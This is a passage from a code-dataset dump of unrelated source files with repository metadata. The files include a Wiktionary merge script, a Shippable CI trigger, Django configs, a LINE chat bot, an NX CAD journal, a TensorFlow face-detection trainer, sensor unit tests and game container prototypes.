return tff.learning.from_compiled_keras_model(keras_model, sample_batch)
return tff.learning.build_federated_averaging_process(model_fn)
def computation_to_building_block(comp):
return building_blocks.ComputationBuildingBlock.from_proto(
comp._computation_proto) # pylint: disable=protected-access
|
[
"tensorflow.copybara@gmail.com"
] |
tensorflow.copybara@gmail.com
|
0a88a90c2b0b47891884919f717aa1f326ee62a0
|
3dd32d9430d482a2116ec6ca213fe7cb46920f23
|
/eval-data/word_translation/merge-wiktionary-dicts.py
|
1116ee1bb465b54045f87fa90066ccd9a636b601
|
[] |
no_license
|
begab/multilingual-embeddings-eval-portal
|
8cc6832afd1d2143bd6f8643c4812a1d90369b34
|
83821717dbc9031f3dee9bffbda719090bb3aa74
|
refs/heads/master
| 2020-07-06T09:21:48.260270
| 2019-08-18T15:06:12
| 2019-08-18T15:06:12
| 202,967,573
| 0
| 0
| null | 2019-08-18T06:20:42
| 2019-08-18T06:20:41
| null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
import shutil
import io
import os
import glob
# twelve: desired_langs = set('bg,cs,da,de,el,en,es,fi,fr,hu,it,sv'.split(','))
# fifty nine:
desired_langs = set("bg|cs|da|de|el|en|es|fi|fr|hu|it|sv|zh|af|ca|iw|cy|ar|ga|zu|et|gl|id|ru|nl|pt|la|tr|ne|lv|lt|tg|ro|is|pl|yi|be|hy|hr|jw|ka|ht|fa|mi|bs|ja|mg|tl|ms|uz|kk|sr|mn|ko|mk|so|uk|sl|sw".split('|'))
processed = set()
test_file = io.open('wiktionary.fifty_nine.test/dictionary', encoding='utf8', mode='w')
dev_file = io.open('wiktionary.fifty_nine.dev/dictionary', encoding='utf8', mode='w')
translations_counter = 0
for filename in glob.glob('wiktionary.*-*'):
if filename.endswith('dev') or filename.endswith('test'): continue
print 'processing', filename
lang1, lang2 = filename[-5:-3], filename[-2:]
if lang1 not in desired_langs or lang2 not in desired_langs: continue
processed.add( (lang1,lang2,) )
if (lang2,lang1,) in processed: continue
for line in io.open(filename, encoding='utf8'):
word1, word2 = line.strip().split(' ||| ')
line = u'{}:{} ||| {}:{}\n'.format(lang1, word1, lang2, word2)
translations_counter += 1
if translations_counter % 2 == 0:
test_file.write(line)
else:
dev_file.write(line)
test_file.close()
dev_file.close()
|
[
"wammar@cs.cmu.edu"
] |
wammar@cs.cmu.edu
|
ae3dc2f7bf203c611851ed1cdfa6151cfb952a15
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-1/c748512c4c45e257bc625ccf036e18c86d69f1c8-<main>-fix.py
|
759edf1deb6fc8e4fa82cf7d84981a26157ee87e
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133
| 2021-10-23T14:11:22
| 2021-10-23T14:11:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,832
|
py
|
def main():
'Main program body.'
api_key = get_api_key()
parser = argparse.ArgumentParser(description='Start a new Shippable run.')
parser.add_argument('project', metavar='account/project', help='Shippable account/project')
target = parser.add_mutually_exclusive_group()
target.add_argument('--branch', help='branch name')
target.add_argument('--run', metavar='ID', help='Shippable run ID')
parser.add_argument('--key', metavar='KEY', default=api_key, required=(not api_key), help='Shippable API key')
parser.add_argument('--env', nargs=2, metavar=('KEY', 'VALUE'), action='append', help='environment variable to pass')
if argcomplete:
argcomplete.autocomplete(parser)
args = parser.parse_args()
headers = dict(Authorization=('apiToken %s' % args.key))
data = dict(projectFullNames=args.project)
url = 'https://api.shippable.com/projects'
response = requests.get(url, data, headers=headers)
if (response.status_code != 200):
raise Exception(response.content)
result = response.json()
if (len(result) != 1):
raise Exception(('Received %d items instead of 1 looking for %s in:\n%s' % (len(result), args.project, json.dumps(result, indent=4, sort_keys=True))))
project_id = response.json()[0]['id']
data = dict(globalEnv=dict(((kp[0], kp[1]) for kp in (args.env or []))))
if args.branch:
data['branchName'] = args.branch
elif args.run:
data['runId'] = args.run
url = ('https://api.shippable.com/projects/%s/newBuild' % project_id)
response = requests.post(url, json=data, headers=headers)
if (response.status_code != 200):
raise Exception(('HTTP %s: %s\n%s' % (response.status_code, response.reason, response.content)))
print(json.dumps(response.json(), indent=4, sort_keys=True))
|
[
"dg1732004@smail.nju.edu.cn"
] |
dg1732004@smail.nju.edu.cn
|
7667e584bd19748364f959b65a717e2d48a22716
|
9951aeb5fc1676e2de41c160ffbcb87054e0276a
|
/hknweb/guide/apps.py
|
83dfa25433ad4c757a86db3ea3961c83b4a94d95
|
[
"MIT"
] |
permissive
|
m1ch43lw4ng/hknweb
|
43f3b0fb22b200f9e470f61d2d109e34921314e0
|
3588c57cdf404d97a3492b6598fc006e86a08cf2
|
refs/heads/master
| 2020-08-30T16:49:45.264238
| 2019-12-01T10:25:01
| 2019-12-01T10:25:01
| 218,436,615
| 0
| 0
|
MIT
| 2019-10-30T03:34:00
| 2019-10-30T03:33:59
| null |
UTF-8
|
Python
| false
| false
| 90
|
py
|
from django.apps import AppConfig
class GuideConfig(AppConfig):
name = 'guide'
|
[
"nfigueira@berkeley.edu"
] |
nfigueira@berkeley.edu
|
4aa5280b547401299b48b1530fdc3f5809bebc5e
|
58f28413ba2b67d169e52b3968a41c8dccf02c57
|
/squarebot.py
|
c55b62ac13b6c65504d9836de9684b5de1af75df
|
[] |
no_license
|
zelebez6969/zelebezsbpy3
|
4d9c07276619e9f323feb6654a19dd6f2a03bdf6
|
4357a5149d31ff29a715b01101ebd69751a2f60e
|
refs/heads/master
| 2021-05-11T19:56:25.358077
| 2018-01-16T22:43:56
| 2018-01-16T22:43:56
| 117,425,357
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,611
|
py
|
# -*- coding: utf-8 -*-
from linepy import *
import time
line = LINE('EMAIL', 'PASSWORD')
#line = LINE('AUTHTOKEN')
line.log("Auth Token : " + str(line.authToken))
squareChatMid='YOUR_SQUARE_CHAT_MID' # Get manual from line.getJoinableSquareChats('YOUR_SQUARE_MID')
# Initialize OEPoll with LINE instance
oepoll = OEPoll(line)
while True:
try:
eventsSquareChat=oepoll.singleFetchSquareChat(squareChatMid=squareChatMid)
for e in eventsSquareChat:
if e.createdTime is not 0:
ts_old = int(e.createdTime) / 1000
ts_now = int(time.time())
line.log('[FETCH_TIME] ' + str(int(e.createdTime)))
if ts_old >= ts_now:
'''
This is sample for implement BOT in LINE square
BOT will noticed who leave square chat
Command availabe :
> hi
> /author
'''
# Receive messages
if e.payload.receiveMessage != None:
payload=e.payload.receiveMessage
line.log('[RECEIVE_MESSAGE]')
msg=payload.squareMessage.message
msg_id=msg.id
receiver_id=msg._from
sender_id=msg.to
if msg.contentType == 0:
text=msg.text
if text.lower() == 'hi':
line.log('%s' % text)
line.sendSquareMessage(squareChatMid, 'Hi too! How are you?')
elif text.lower() == '/author':
line.log('%s' % text)
line.sendSquareMessage(squareChatMid, 'My author is linepy')
# Notified leave Square Chat
elif e.payload.notifiedLeaveSquareChat != None:
payload=e.payload.notifiedLeaveSquareChat
line.log('[NOTIFIED_LEAVE_SQUARE_CHAT]')
squareMemberMid=payload.squareChatMid
squareMemberMid=payload.squareMemberMid
squareMember=payload.squareMember
displayName=squareMember.displayName
line.sendSquareMessage(squareChatMid, 'Good bye! ' + str(displayName))
else:
pass
except:
line.log("[FETCH_SQUARE] Fetch square chat error")
|
[
"noreply@github.com"
] |
zelebez6969.noreply@github.com
|
4dfceb56898cad5d00fa84665e24c42ab7bf33df
|
12e4cbfd3445d3180565df20d2a7a152bb931ecc
|
/Backend/users/migrations/0004_auto_20210514_0856.py
|
e32b74a819118a4605fa3d5b495e9c610fac4a04
|
[] |
no_license
|
ihonomic/Blog-App-React-Django
|
04dc267e458b69f26ccf8d1b650a7b7708faa72c
|
7c0ae907cd87d5cc261d20bcd14af90cc6aa51dc
|
refs/heads/master
| 2023-08-23T20:54:40.987522
| 2021-10-06T10:29:57
| 2021-10-06T10:29:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 601
|
py
|
# Generated by Django 3.1.4 on 2021-05-14 07:56
from django.db import migrations
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0003_auto_20210513_1716'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='created_at',
field=users.models.CustomDateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='customuser',
name='updated_at',
field=users.models.CustomDateTimeField(auto_now=True),
),
]
|
[
"onosetaleoseghale@gmail.com"
] |
onosetaleoseghale@gmail.com
|
4fed172f79994c420a9d9ad5393b219b95caa670
|
8f133dc975aa970b19c5dad02de758d2cc0cdc5a
|
/Nodes/Journal/journal-newpart.py
|
912abd2a090ffbdbcb5774a396867684dce2b5fb
|
[] |
no_license
|
lerausenco/KBE-Prosjekt
|
25a2b93adb9caf5529abcf6de283deccf1fe90e4
|
13fb0f296018f3df7688f6f23adcd4df4360fb2e
|
refs/heads/main
| 2023-04-09T15:49:49.417139
| 2021-04-26T09:40:54
| 2021-04-26T09:40:54
| 333,350,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,039
|
py
|
# NX 1911
# Journal created by lera_ on Tue Apr 13 10:18:08 2021 W. Europe Summer Time
#
import math
import NXOpen
def main() :
theSession = NXOpen.Session.GetSession()
workPart = theSession.Parts.Work
displayPart = theSession.Parts.Display
# ----------------------------------------------
# Menu: File->New...
# ----------------------------------------------
markId1 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Visible, "Start")
fileNew1 = theSession.Parts.FileNew()
theSession.SetUndoMarkName(markId1, "New Dialog")
markId2 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Invisible, "New")
theSession.DeleteUndoMark(markId2, None)
markId3 = theSession.SetUndoMark(NXOpen.Session.MarkVisibility.Invisible, "New")
fileNew1.TemplateFileName = "model-plain-1-mm-template.prt"
fileNew1.UseBlankTemplate = False
fileNew1.ApplicationName = "ModelTemplate"
fileNew1.Units = NXOpen.Part.Units.Millimeters
fileNew1.RelationType = ""
fileNew1.UsesMasterModel = "No"
fileNew1.TemplateType = NXOpen.FileNewTemplateType.Item
fileNew1.TemplatePresentationName = "Model"
fileNew1.ItemType = ""
fileNew1.Specialization = ""
fileNew1.SetCanCreateAltrep(False)
fileNew1.NewFileName = "C:\\Users\\lera_\\OneDrive\\Dokumenter\\NTNU\\KBE\\KBE-Prosjekt\\Nodes\\Parts\\model2.prt"
fileNew1.MasterFileName = ""
fileNew1.MakeDisplayedPart = True
fileNew1.DisplayPartOption = NXOpen.DisplayPartOption.AllowAdditional
nXObject1 = fileNew1.Commit()
workPart = theSession.Parts.Work # model2
displayPart = theSession.Parts.Display # model2
theSession.DeleteUndoMark(markId3, None)
fileNew1.Destroy()
# ----------------------------------------------
# Menu: Tools->Journal->Stop Recording
# ----------------------------------------------
if __name__ == '__main__':
main()
|
[
"usencolera@gmail.com"
] |
usencolera@gmail.com
|
ab0a2ba6e4d3d375e56ab4ac661c7d7ddf068306
|
ec80f504ab4511e27c7e4afe801b8e6b8ddf6900
|
/examples/ex_cnn_cascade_training_face_detection/12net_detection_training.py
|
0f64a4a441f8628405401d4cb2a8c19f4f58f298
|
[
"MIT"
] |
permissive
|
ssteveminq/deepgaze
|
afdc3aeb7d0b0ba247a3cf5850981f899abb3082
|
6df11f3799b36d7d0d45fbbb77be21eec456ddd4
|
refs/heads/master
| 2021-01-25T10:06:11.775804
| 2019-04-11T18:18:14
| 2019-04-11T18:18:14
| 123,338,160
| 0
| 1
|
MIT
| 2018-02-28T20:23:47
| 2018-02-28T20:23:47
| null |
UTF-8
|
Python
| false
| false
| 12,414
|
py
|
#!/usr/bin/env python
# The MIT License (MIT)
# Copyright (c) 2017 Massimiliano Patacchiola
# https://mpatacchiola.github.io
# https://mpatacchiola.github.io/blog/
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import print_function
import numpy as np
import tensorflow as tf
from six.moves import cPickle as pickle
import cv2 # to visualize a preview
import datetime
import os
def main():
# Load the standard file
image_size = 12
batch_size = 64
patch_size = 5
num_labels = 2
num_channels = 3 # colour
tot_epochs = 10000 # epochs
# Change this path based on your datasets location
pickle_file_positive = "./positive_dataset_12net_98452.pickle"
pickle_file_negative = "./negative_dataset_12net_198081.pickle"
with open(pickle_file_positive, 'rb') as f:
save = pickle.load(f)
train_dataset_positive = save['training_dataset']
train_label_positive = save['training_label']
del save # hint to help gc free up memory
# Here we take only part of the train and test set
print('Training set', train_dataset_positive.shape, train_label_positive.shape)
with open(pickle_file_negative, 'rb') as f:
save = pickle.load(f)
train_dataset_negative = save['training_dataset']
train_label_negative = save['training_label']
del save # hint to help gc free up memory
# Here we take only part of the train and test set
print('Training set', train_dataset_negative.shape, train_label_negative.shape)
# Creating the test set taking the first 100 images
test_dataset = np.concatenate((train_dataset_positive[0:100, :, :], train_dataset_negative[0:100, :, :]), axis=0)
test_label = np.concatenate((train_label_positive[0:100, :], train_label_negative[0:100, :]), axis=0)
train_dataset_positive = train_dataset_positive[100:, :, :]
train_dataset_negative = train_dataset_negative[100:, :, :]
train_label_positive = train_label_positive[100:, :]
train_label_negative = train_label_negative[100:, :]
#Estimating the number of elements in both datasets
total_positive = train_dataset_positive.shape[0]
total_negative = train_dataset_negative.shape[0]
# Normalisation
#train_dataset -= 127
#validation_dataset -= 127
#test_dataset -= 127
#train_dataset /= 255
#validation_dataset /= 255
#test_dataset /= 255
graph = tf.Graph()
with graph.as_default():
tf_initializer = None #tf.random_normal_initializer()
# Input data.
tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))
tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))
tf_test_dataset = tf.placeholder(tf.float32, shape=(None, image_size, image_size, num_channels))
# Conv layer
# [patch_size, patch_size, num_channels, depth]
conv1_weights = tf.get_variable("conv1_12d_w", [3, 3, num_channels, 16], initializer=tf_initializer)
conv1_biases = tf.Variable(tf.zeros([16]), name="conv1_12d_b")
# Dense layer
# [ 5*5 * previous_layer_out , num_hidden] wd1
# after pooling the 12x12 image is reduced to size 6x6
dense1_weights = tf.get_variable("dense1_12d_w", [6 * 6 * 16, 16], initializer=tf_initializer)
dense1_biases = tf.Variable(tf.random_normal(shape=[16]), name="dense1_12d_b")
# Output layer
layer_out_weights = tf.get_variable("out_12d_w", [16, num_labels], initializer=tf_initializer)
layer_out_biases = tf.Variable(tf.random_normal(shape=[num_labels]), name="out_12d_b")
# dropout (keep probability)
keep_prob = tf.placeholder(tf.float32)
# Model.
def model(data, _dropout=1.0):
X = tf.reshape(data, shape=[-1, image_size, image_size, num_channels])
print("SHAPE X: " + str(X.get_shape())) # Convolution Layer 1
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(X, conv1_weights, strides=[1, 1, 1, 1], padding='SAME'), conv1_biases))
print("SHAPE conv1: " + str(conv1.get_shape()))
# Max Pooling (down-sampling)
pool1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
print("SHAPE pool1: " + str(pool1.get_shape()))
# Apply Normalization
norm1 = tf.nn.lrn(pool1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75)
# Apply Dropout
norm1 = tf.nn.dropout(norm1, _dropout)
# Fully connected layer
dense1 = tf.reshape(norm1, [-1, dense1_weights.get_shape().as_list()[0]]) # Reshape conv3
print("SHAPE dense1: " + str(dense1.get_shape()))
dense1 = tf.nn.relu(tf.matmul(dense1, dense1_weights) + dense1_biases) # Relu
dense1 = tf.nn.dropout(dense1, _dropout)
# Output layer
out = tf.matmul(dense1, layer_out_weights) + layer_out_biases
print("SHAPE out: " + str(out.get_shape()))
# Return the output with logits
return out
# Training computation.
logits = model(tf_train_dataset, keep_prob)
loss = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits))
#- Adding the regularization terms to the loss
#beta = 5e-4 #it was: 5e-4 = 0.0005
#loss += (beta * tf.nn.l2_loss(conv1_weights))
#loss += (beta * tf.nn.l2_loss(dense1_weights))
#loss += (beta * tf.nn.l2_loss(layer_out_weights))
loss_summ = tf.summary.scalar("loss", loss)
# Find the batch accuracy and save it in summary
accuracy = tf.equal(tf.argmax(tf_train_labels, 1), tf.argmax(logits, 1))
accuracy = tf.reduce_mean(tf.cast(accuracy, tf.float32))
accuracy_summary = tf.summary.scalar("accuracy", accuracy)
# Optimizer.
# learning_rate = 0.001 #it was: 0.001
global_step = tf.Variable(0, trainable=False) # count the number of steps taken.
#learning_rate = tf.train.exponential_decay(0.000098, global_step, 15000, 0.1, staircase=True)
#lrate_summ = tf.scalar_summary("learning rate", learning_rate)
#optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)
#optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss, global_step=global_step)
#optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001, decay=0.9, momentum=0.0, epsilon=1e-10, use_locking=False, name='RMSProp').minimize(loss, global_step=global_step)
#optimizer = tf.train.AdagradOptimizer(learning_rate=0.00625).minimize(loss, global_step=global_step)
#optimizer = tf.train.MomentumOptimizer(learning_rate=0.0001, momentum=0.95).minimize(loss, global_step=global_step)
optimizer = tf.train.AdadeltaOptimizer(learning_rate=0.001, rho=0.95, epsilon=1e-08, use_locking=False, name='Adadelta').minimize(loss, global_step=global_step)
# Predictions for the training, validation, and test data.
train_prediction = logits
# Call test_prediction and pass the test inputs to have test accuracy
test_prediction = model(tf_test_dataset)
_, test_accuracy = tf.metrics.accuracy(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_recall = tf.metrics.recall(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_precision = tf.metrics.precision(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_false_positives = tf.metrics.false_positives(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
_, test_false_negatives = tf.metrics.false_negatives(labels=tf.argmax(test_label, 1), predictions=tf.argmax(test_prediction, 1))
# Save all the variables
saver = tf.train.Saver()
with tf.Session(graph=graph) as session:
# Summary definition
merged_summaries = tf.summary.merge_all()
now = datetime.datetime.now()
log_path = "./logs/log_12net_detection_" + str(now.hour) + str(now.minute) + str(now.second)
writer_summaries = tf.summary.FileWriter(log_path, session.graph)
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
# tf.initialize_all_variables().run()
print('Initialized')
for step in range(tot_epochs):
# Pick random images in euqal number from positive and negative dataset
quantity_positive = int(batch_size/2)
quantity_negative = batch_size - quantity_positive
indices_positive = np.random.randint(total_positive, size=quantity_positive)
indices_negative = np.random.randint(total_negative, size=quantity_negative)
batch_data = np.concatenate((np.take(train_dataset_positive, indices_positive, axis=0),
np.take(train_dataset_negative, indices_negative, axis=0)))
batch_labels = np.concatenate((np.take(train_label_positive, indices_positive, axis=0),
np.take(train_label_negative, indices_negative, axis=0)))
feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels, keep_prob: 1.0}
_, acc, l, predictions, my_summary = session.run([optimizer, accuracy, loss, train_prediction, merged_summaries],
feed_dict=feed_dict)
writer_summaries.add_summary(my_summary, step)
if (step % 100 == 0):
print("")
print("Loss at step: ", step, " is " , l)
print("Global Step: " + str(global_step.eval()) + " of " + str(tot_epochs))
#print("Learning Rate: " + str(learning_rate.eval()))
print("Minibatch size: " + str(batch_labels.shape))
print("Accuracy: " + str(acc))
print("")
# Save and test the network
checkpoint_path = "./checkpoints/12net_detection_" + str(now.hour) + str(now.minute) + str(now.second)
if not os.path.exists(checkpoint_path):
os.makedirs(checkpoint_path)
saver.save(session, checkpoint_path + "/cnn_12net_detection" , global_step=step) # save the session
feed_dict = {tf_test_dataset: test_dataset, keep_prob: 1.0}
test_acc, test_rec, test_prec, test_fp, test_fn = session.run([test_accuracy, test_recall, test_precision, test_false_positives, test_false_negatives], feed_dict=feed_dict)
print("# Tot. images tested: " + str(test_dataset.shape[0]))
print("# Test accuracy: " + str(test_acc))
print("# Test recall: " + str(test_rec))
print("# Test precision: " + str(test_prec))
print("# Test false positives: " + str(test_fp))
print("# Test false negatives: " + str(test_fn))
print("")
if __name__ == "__main__":
main()
|
[
"massimiliano.patacchiola@gmail.com"
] |
massimiliano.patacchiola@gmail.com
|
60c39c72e082c9c044c5d0be1a61ab4fa9df1bb3
|
85dde97106860f9d059e9750243ec0e26501d540
|
/Sensor/test/tests.py
|
a43175955355889b52a456f2ace72f2c9990d5e8
|
[] |
no_license
|
tomaszKakol/Monitoring_system_of_distributed_computer_resources
|
f174793fbba6c8ed1419cc61243fb1975e20fb18
|
d6eab21894da75c12e15e59d81b0f3af2f20ee1e
|
refs/heads/master
| 2022-12-13T09:39:38.005336
| 2019-12-03T00:32:14
| 2019-12-03T00:32:14
| 225,493,632
| 0
| 0
| null | 2022-12-08T05:24:29
| 2019-12-03T00:14:30
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,626
|
py
|
import unittest
from source.tools import SensorTools
import platform
from unittest.mock import patch
class TestSensorMethods(unittest.TestCase):
def test_set_variables_CPU(self):
metric = "CPU"
name = "testCPU"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testCPU_CPU_Host/measurements", tool.API_CPU_MEASUREMENTS_ENDPOINT)
self.assertEqual("CPU", tool.metric)
self.assertEqual("testCPU", tool.hostID)
self.assertEqual("CPU", tool.type)
self.assertEqual("%", tool.unit)
self.assertEqual("testCPU_CPU_Host", tool.metric_id)
def test_set_variables_battery(self):
metric = "Battery"
name = "testBattery"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBattery_Battery_Host/measurements", tool.API_BATTERY_MEASUREMENTS_ENDPOINT)
self.assertEqual("Battery", tool.metric)
self.assertEqual("testBattery", tool.hostID)
self.assertEqual("Battery", tool.type)
self.assertEqual("%", tool.unit)
self.assertEqual("testBattery_Battery_Host", tool.metric_id)
def test_set_variables_both(self):
metric = "Both"
name = "testBoth"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
self.assertEqual("http://localhost:8080/v1/hosts", tool.API_REGISTER_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBoth_CPU_Host/measurements", tool.API_CPU_MEASUREMENTS_ENDPOINT)
self.assertEqual("http://localhost:8080/v1/metrics/testBoth_Battery_Host/measurements", tool.API_BATTERY_MEASUREMENTS_ENDPOINT)
self.assertEqual("Both", tool.metric)
self.assertEqual("testBoth", tool.hostID)
self.assertEqual("CPU", tool.type1)
self.assertEqual("%", tool.unit1)
self.assertEqual("testBoth_CPU_Host", tool.metric_id1)
self.assertEqual("Battery", tool.type2)
self.assertEqual("%", tool.unit2)
self.assertEqual("testBoth_Battery_Host", tool.metric_id2)
def test_register_json_data_for_one_metric(self):
right_data = {
'host-id': 'test',
'os': str(platform.system()),
'metrics': [{
'type': 'CPU',
'unit': '%',
'metric-id': 'test_CPU_Host'
}]
}
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
data = tool.register_json_data_for_one_metric()
self.assertEqual(right_data, data)
def test_register_json_data_for_two_metric(self):
right_data = {
'host-id': 'test',
'os': str(platform.system()),
'metrics': [{
'type': 'CPU',
'unit': '%',
'metric-id': 'test_CPU_Host'
},
{
'type': 'Battery',
'unit': '%',
'metric-id': 'test_Battery_Host'
}]
}
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
data = tool.register_json_data_for_two_metrics()
self.assertEqual(right_data, data)
def test_json_data_for_one_metric(self):
right_data = [{'val': '2', 'ts': 1.4}, {'val': '3', 'ts': 1.7}]
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.coppy_data()
tool.data_to_send = [2, 3]
tool.data_timestamp_to_send = [1.4, 1.7]
data = tool.json_data_for_one_metric()
self.assertEqual(right_data, data)
def test_json_data_for_two_metrics(self):
right_data = [[{'val': '2', 'ts': 1.4}, {'val': '3', 'ts': 1.7}], [{'val': '5', 'ts': 1.4}, {'val': '6', 'ts': 1.7}]]
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.coppy_data()
tool.data1_to_send = [2, 3]
tool.data2_to_send = [5, 6]
tool.data_timestamp_to_send = [1.4, 1.7]
data = tool.json_data_for_two_metrics()
self.assertEqual(right_data, data)
def test_copy_data_both(self):
metric = "Both"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.collected_data1 = [2, 3]
tool.collected_data2 = [5, 6]
tool.timestamp = [1.4, 1.7]
tool.coppy_data()
self.assertEqual([2, 3], tool.data1_to_send)
self.assertEqual([5, 6], tool.data2_to_send)
self.assertEqual([1.4, 1.7], tool.data_timestamp_to_send)
self.assertEqual([], tool.collected_data1)
self.assertEqual([], tool.collected_data2)
self.assertEqual([], tool.timestamp)
def test_copy_data_CPU(self):
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.collected_data = [2, 3]
tool.timestamp = [1.4, 1.7]
tool.coppy_data()
self.assertEqual([2, 3], tool.data_to_send)
self.assertEqual([1.4, 1.7], tool.data_timestamp_to_send)
self.assertEqual([], tool.collected_data)
self.assertEqual([], tool.timestamp)
def test_data_amount(self):
metric = "CPU"
name = "test"
url = "http://localhost:8080/v1/"
tool = SensorTools(metric, name, url)
tool.timestamp = [1.4, 1.7, 2.2, 3.1, 5.8]
self.assertEqual(5, tool.data_amount())
if __name__ == '__main__':
unittest.main()
|
[
"tomaszkakol19921114@gmail.com"
] |
tomaszkakol19921114@gmail.com
|
ba40a8c5110e9d044b9d98a5e689130a0f613dfb
|
ea384acfec1ae21bc8583258ecaa187ded4b22d6
|
/data/base/prototypes/entity/containers.py
|
59ca9962024efd9710a4f9f126b8bef128a34edd
|
[
"MIT"
] |
permissive
|
cmk1988/Jactorio
|
da03e97d0fa8bfbf9428e45aa2e4772c0ea9542b
|
4056b4c16614d566ec8d90b250621e03645bf4d2
|
refs/heads/master
| 2023-03-28T03:05:24.337666
| 2021-03-13T20:31:30
| 2021-03-13T20:31:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
import jactorioData as j
# An item will be created with the name {name}-item | With `wooden-chest`: `wooden-chest-item`
def addContainer(name, invSize, health, worldSprite, itemSprite):
(j.ContainerEntity(name)
.tileWidth(1)
.tileHeight(1)
.maxHealth(health)
.inventorySize(invSize)
.pickupTime(0.1)
.sprite(
j.Sprite()
.load(worldSprite)
)
.item(
j.Item(name + "-item")
.sprite(
j.Sprite()
.load(itemSprite)
)
)
)
addContainer("wooden-chest", 16, 100,
"base/graphics/entity/wooden-chest/hr-wooden-chest.png",
"base/graphics/entity/wooden-chest/wooden-chest.png")
addContainer("iron-chest", 32, 200,
"base/graphics/entity/iron-chest/hr-iron-chest.png",
"base/graphics/entity/iron-chest/iron-chest.png")
addContainer("steel-chest", 48, 350,
"base/graphics/entity/steel-chest/hr-steel-chest.png",
"base/graphics/entity/steel-chest/steel-chest.png")
|
[
"jaihysc@gmail.com"
] |
jaihysc@gmail.com
|
2c2b933d610693ff63ffe94f0c0b0df46fd2d16c
|
a0e4b984638355a67ec50efcb60cf7e945daafe7
|
/sigid/example.py
|
d98f550f8516a86323f11365fb9ced534fbf718b
|
[] |
no_license
|
MrSaints/data-engineer-assignment-sigid
|
7de3ad27a4dd8efeb511bff741a1218cc483fb14
|
16519f5bad9e6f7b7da37f719a4e176808d8a012
|
refs/heads/master
| 2020-04-17T04:22:35.507844
| 2019-01-28T10:16:31
| 2019-01-28T10:17:33
| 166,227,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,268
|
py
|
from typing import List
from sigid.mock_asset_service import MockAssetService
from sigid.mock_signature_repository import MockSignatureRepository
from sigid.mock_signee_repository import MockSigneeRepository
from sigid.service import (
AnyNewSignature,
NewImageSignature,
NewXYZSignature,
SignatureApplicationService,
)
if __name__ == "__main__":
# Data stores
signee_repository = MockSigneeRepository()
signature_repository = MockSignatureRepository()
# Services
asset_service = MockAssetService()
application = SignatureApplicationService(
signee_repository=signee_repository,
signature_repository=signature_repository,
asset_service=asset_service,
)
# Test data
test_signatures: List[AnyNewSignature] = [
NewImageSignature(local_uri="/tmp/does_not_actually_exist"),
# [ (X, Y, Z) ... n ]
NewXYZSignature(points=[(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)]),
]
# Use test data
application.register_signatures(test_signatures)
# Check if test data is stored in the mock data stores
print("Signees:", signee_repository.signee_by_id)
